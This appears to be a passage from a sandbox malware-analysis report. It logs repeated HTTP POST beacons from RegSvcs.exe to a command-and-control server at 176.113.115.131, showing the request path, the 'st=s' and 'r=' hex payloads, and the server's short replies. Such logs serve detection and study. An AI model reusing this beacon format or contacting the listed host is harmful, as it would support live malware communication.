                                                    Jan 8, 2025 08:43:42.671935081 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:43:43.362859011 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:43 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    45192.168.2.456102176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:44.874779940 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:43:45.574013948 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:45 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    46192.168.2.456103176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:47.206691980 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:43:47.893065929 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:47 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    47192.168.2.456104176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:49.406824112 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:43:50.102644920 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:49 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    48192.168.2.456105176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:51.734407902 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:43:52.439913034 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:52 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    49192.168.2.456106176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:53.954473972 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:43:54.668608904 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:54 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    50192.168.2.456107176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:56.297605038 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:43:56.983952999 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:56 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    51192.168.2.456108176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:58.504410028 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:43:59.203466892 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:59 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    52192.168.2.456109176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:00.829441071 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:44:01.543853998 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:01 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    53192.168.2.456110176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:03.065023899 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:44:03.754291058 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    54192.168.2.456111176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:05.391397953 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:44:06.114204884 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:06 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    55192.168.2.456112176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:07.625771999 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:44:08.335683107 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:08 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    56192.168.2.456113176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:09.969321012 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:44:10.667959929 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:10 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    57192.168.2.456114176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:12.188338041 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:44:12.903877974 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:12 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    58192.168.2.456115176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:14.531332016 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:44:15.240238905 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:15 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    59192.168.2.456116176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:16.750243902 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:44:17.458482027 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:17 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    60192.168.2.456117176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:19.097361088 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:44:19.804025888 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:19 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    61192.168.2.456118176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:21.316484928 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:44:22.035444975 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    62192.168.2.456119176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:23.672636986 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:44:24.375452995 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:24 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    63192.168.2.456120176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:25.899329901 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:44:26.596529007 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:26 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    64192.168.2.456121176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:28.234433889 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:44:28.942631006 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:28 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    65192.168.2.456122176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:44:30.456530094 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
